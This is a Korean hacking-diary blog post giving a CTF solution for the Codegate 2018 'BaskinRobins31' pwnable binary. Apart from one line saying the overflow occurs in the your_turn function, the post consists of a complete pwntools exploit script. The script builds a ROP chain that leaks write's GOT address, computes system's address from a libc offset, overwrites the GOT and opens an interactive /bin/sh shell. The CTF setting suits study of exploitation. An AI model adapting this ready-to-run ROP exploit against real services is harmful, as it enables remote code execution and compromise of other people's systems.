| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | ||||
| 4 | 5 | 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 | 16 | 17 |
| 18 | 19 | 20 | 21 | 22 | 23 | 24 |
| 25 | 26 | 27 | 28 | 29 | 30 | 31 |
- BLUETOOTH
- 노드 엑셀
- 도메인 https
- CVE
- Git
- gogs
- module
- NGINX
- lob
- 코드게이트
- npm
- 코드게이트 주니어
- Branch
- Codegate
- node
- pwnable
- xlsx
- node.js
- gogs private git
- https설정
- blueborne
- openctf
- Hacking
- shellcraft
- 코드게이트2017
- CODEGATE2018
- codegate2017
- doorlock
- https
- pwntools
- Today
- Total
고졸백수해킹일기
codegate2018 BaskinRobins31 본문
추천받아서 풀어본 문제
your_turn 함수에서 터지게 된다.
file : http://web.noe.systems/binary/Baskinrobins31
아래는 페이로드
from pwn import *
prob = ELF('./BaskinRobins31')
#print prob.symbols['read']
s = remote("localhost",7777)
dummy = "1"+"A"*183 #0xB0
write_plt = 0x4006d0
write_got = 0x602028
read_plt = 0x400700
read_got = 0x602040
sh = "/bin/sh"
bss = 0x602090
gad = 0x40087a
payload = ""
offset_system = 0xa8e20
print s.recvuntil("How many numbers do you want to take ? (1-3)")
payload+=dummy
payload+=p64(gad)
payload+=p64(1)
payload+=p64(write_got)
payload+=p64(8)
payload+=p64(write_plt)
payload+=p64(gad)
payload+=p64(0)
payload+=p64(bss)
payload+=p64(len(sh))
payload+=p64(read_plt)
payload+=p64(gad)
payload+=p64(0)
payload+=p64(write_got)
payload+=p64(8)
payload+=p64(read_plt)
payload+=p64(0x00400bc3)
payload+=p64(bss)
payload+=p64(write_plt)
s.sendline(payload)
print s.recvuntil("\n")
print s.recvuntil("\n")
print s.recvuntil("\x00")
write = u64(s.recv(7)+"\x00")
system = write-offset_system
s.send(sh)
s.send(p64(system))
s.interactive()
'Pwnable' 카테고리의 다른 글
| ARM exploit (0) | 2020.09.12 |
|---|---|
| pdb symbol 수동으로 다운 (0) | 2020.08.14 |
| defcon2017 smashme (exploit only) (0) | 2018.03.28 |
| pwntools shellcraft 사용법 (0) | 2018.03.15 |
| codegate2014 nuclear (0) | 2018.03.09 |